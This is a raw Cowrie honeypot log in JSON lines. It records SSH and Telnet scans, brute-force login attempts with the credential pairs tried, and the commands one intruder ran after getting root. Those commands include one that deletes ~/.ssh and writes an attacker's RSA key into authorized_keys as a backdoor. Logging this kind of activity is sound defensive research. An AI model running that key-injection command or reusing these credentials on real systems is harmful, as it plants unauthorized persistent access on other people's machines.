25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:31:26.873526Z","src_ip":"27.112.78.245","session":"ef4a09bd9bbc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:31:27.961874Z","src_ip":"27.112.78.245","session":"ef4a09bd9bbc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:29.224511Z","src_ip":"27.112.78.245","session":"ef4a09bd9bbc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":33328,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aae3431d7db","protocol":"ssh","message":"New connection: 27.112.78.245:33328 (1.2.3.4:22) [session: 1aae3431d7db]","sensor":"my-vps","timestamp":"2025-08-26T00:31:29.490593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:31:29.491564Z","src_ip":"27.112.78.245","session":"1aae3431d7db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:31:29.758454Z","src_ip":"27.112.78.245","session":"1aae3431d7db"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:31:30.871265Z","src_ip":"27.112.78.245","session":"1aae3431d7db"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:31.140305Z","src_ip":"27.112.78.245","session":"1aae3431d7db"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:31.141288Z","src_ip":"27.112.78.245","session":"06bb4db7bcf4"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37504,"dst_ip":"1.2.3.4","dst_port":22,"session":"26654aa0e002","protocol":"ssh","message":"New connection: 45.159.112.103:37504 (1.2.3.4:22) [session: 26654aa0e002]","sensor":"my-vps","timestamp":"2025-08-26T00:31:33.277009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:31:33.277950Z","src_ip":"45.159.112.103","session":"26654aa0e002"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:31:33.388730Z","src_ip":"45.159.112.103","session":"26654aa0e002"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"123456","message":"login attempt [rancher/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:31:33.872732Z","src_ip":"45.159.112.103","session":"26654aa0e002"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:34.985946Z","src_ip":"45.159.112.103","session":"26654aa0e002"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44510,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a13bfbbcb6","protocol":"ssh","message":"New connection: 24.108.102.132:44510 (1.2.3.4:22) [session: 24a13bfbbcb6]","sensor":"my-vps","timestamp":"2025-08-26T00:31:49.066730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:31:49.077549Z","src_ip":"24.108.102.132","session":"24a13bfbbcb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:31:49.245358Z","src_ip":"24.108.102.132","session":"24a13bfbbcb6"}
{"eventid":"cowrie.login.failed","username":"mosprop","password":"123456","message":"login attempt [mosprop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:31:49.905675Z","src_ip":"24.108.102.132","session":"24a13bfbbcb6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:31:51.073820Z","src_ip":"24.108.102.132","session":"24a13bfbbcb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41244,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4bcf9e3b4fc","protocol":"ssh","message":"New connection: 212.227.125.160:41244 (1.2.3.4:22) [session: c4bcf9e3b4fc]","sensor":"my-vps","timestamp":"2025-08-26T00:32:12.004079Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:12.004801Z","src_ip":"212.227.125.160","session":"c4bcf9e3b4fc"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:12.005680Z","src_ip":"212.227.125.160","session":"c4bcf9e3b4fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39942,"dst_ip":"1.2.3.4","dst_port":23,"session":"52482bd039a1","protocol":"telnet","message":"New connection: 212.227.125.160:39942 (1.2.3.4:23) [session: 52482bd039a1]","sensor":"my-vps","timestamp":"2025-08-26T00:32:13.175337Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41096,"dst_ip":"1.2.3.4","dst_port":22,"session":"09aeb0504f59","protocol":"ssh","message":"New connection: 36.89.28.139:41096 (1.2.3.4:22) [session: 09aeb0504f59]","sensor":"my-vps","timestamp":"2025-08-26T00:32:13.329848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:13.330780Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:13.534636Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd=1234","message":"login attempt [root/Abcd=1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:32:15.593109Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:16.068188Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.068949Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.069792Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.275154Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:16.698825Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.699484Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.905989Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:16.906826Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48340,"dst_ip":"1.2.3.4","dst_port":22,"session":"2428f885de21","protocol":"ssh","message":"New connection: 36.89.28.139:48340 (1.2.3.4:22) [session: 2428f885de21]","sensor":"my-vps","timestamp":"2025-08-26T00:32:17.096569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:17.097579Z","src_ip":"36.89.28.139","session":"2428f885de21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:17.287310Z","src_ip":"36.89.28.139","session":"2428f885de21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:32:18.090948Z","src_ip":"36.89.28.139","session":"2428f885de21"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:19.283800Z","src_ip":"36.89.28.139","session":"2428f885de21"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48354,"dst_ip":"1.2.3.4","dst_port":22,"session":"de161941ce07","protocol":"ssh","message":"New connection: 36.89.28.139:48354 (1.2.3.4:22) [session: de161941ce07]","sensor":"my-vps","timestamp":"2025-08-26T00:32:19.440483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:19.441462Z","src_ip":"36.89.28.139","session":"de161941ce07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:19.615346Z","src_ip":"36.89.28.139","session":"de161941ce07"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:32:20.894908Z","src_ip":"36.89.28.139","session":"de161941ce07"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:21.070141Z","src_ip":"36.89.28.139","session":"de161941ce07"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:21.084232Z","src_ip":"36.89.28.139","session":"09aeb0504f59"}
{"eventid":"cowrie.session.closed","duration":12.63197135925293,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:25.807226Z","src_ip":"212.227.125.160","session":"52482bd039a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40263,"dst_ip":"1.2.3.4","dst_port":23,"session":"92f3e2c63cbc","protocol":"telnet","message":"New connection: 212.227.125.160:40263 (1.2.3.4:23) [session: 92f3e2c63cbc]","sensor":"my-vps","timestamp":"2025-08-26T00:32:25.979019Z"}
{"eventid":"cowrie.session.closed","duration":12.822953224182129,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:38.801898Z","src_ip":"212.227.125.160","session":"92f3e2c63cbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40602,"dst_ip":"1.2.3.4","dst_port":23,"session":"e83cc01c081e","protocol":"telnet","message":"New connection: 212.227.125.160:40602 (1.2.3.4:23) [session: e83cc01c081e]","sensor":"my-vps","timestamp":"2025-08-26T00:32:39.045133Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":58310,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4e98ea3a9bf","protocol":"ssh","message":"New connection: 45.159.112.103:58310 (1.2.3.4:22) [session: f4e98ea3a9bf]","sensor":"my-vps","timestamp":"2025-08-26T00:32:40.594451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:40.595178Z","src_ip":"45.159.112.103","session":"f4e98ea3a9bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:40.703905Z","src_ip":"45.159.112.103","session":"f4e98ea3a9bf"}
{"eventid":"cowrie.login.failed","username":"suporte","password":"suporte123","message":"login attempt [suporte/suporte123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:32:41.183971Z","src_ip":"45.159.112.103","session":"f4e98ea3a9bf"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:42.293919Z","src_ip":"45.159.112.103","session":"f4e98ea3a9bf"}
{"eventid":"cowrie.session.closed","duration":12.796112775802612,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:51.841131Z","src_ip":"212.227.125.160","session":"e83cc01c081e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40922,"dst_ip":"1.2.3.4","dst_port":23,"session":"55036f371035","protocol":"telnet","message":"New connection: 212.227.125.160:40922 (1.2.3.4:23) [session: 55036f371035]","sensor":"my-vps","timestamp":"2025-08-26T00:32:52.106998Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35878,"dst_ip":"1.2.3.4","dst_port":22,"session":"7faa670ca7e8","protocol":"ssh","message":"New connection: 27.112.78.245:35878 (1.2.3.4:22) [session: 7faa670ca7e8]","sensor":"my-vps","timestamp":"2025-08-26T00:32:52.568874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:52.569835Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
